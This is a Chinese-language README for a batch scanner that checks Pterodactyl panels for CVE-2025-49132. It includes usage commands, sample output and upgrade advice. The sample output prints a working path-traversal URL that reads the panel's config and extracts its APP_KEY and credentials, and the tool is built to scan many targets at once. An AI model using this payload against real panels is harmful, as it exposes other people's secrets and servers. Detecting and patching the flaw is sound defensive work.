Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓# CVE-2025-49132_poc
## 使用示例
1. **扫描单个目标**:
```bash
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
```
2. **扫描目标列表**:
```bash
python3 CVE-2025-49132_poc.py -f 目标列表.txt
```
3. **保存扫描结果**:
```bash
python3 CVE-2025-49132_poc.py -f 目标列表.txt -o 扫描结果.txt
```
## 输出示例:
**存在漏洞时**:
```
[+] 存在漏洞: 漏洞确认
漏洞详情:
• 漏洞类型: 路径遍历
• 攻击向量: 通过路径遍历参数访问 /locales/locale.json
• 利用 URL: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
潜在影响:
• 读取面板配置文件 (.env) 中的凭据
• 提取数据库中的敏感信息
• 访问面板管理的游戏服务器文件
提取的 APP_KEY: base64{{your_secret_key_here}}
修复建议: 立即升级到 Pterodactyl v1.11.11 或更高版本
```
**不存在漏洞时**:
```
[-] 不存在漏洞: 不存在漏洞 (状态码: 404)
```
**扫描摘要**:
```
扫描摘要:
• 扫描目标总数: 5
• 存在漏洞的目标: 2
• 安全的目标: 3
[!] 严重: 检测到存在漏洞的系统! 需要立即采取措施。
```
登录后查看神龙缓存的 POC 文件快照
登录查看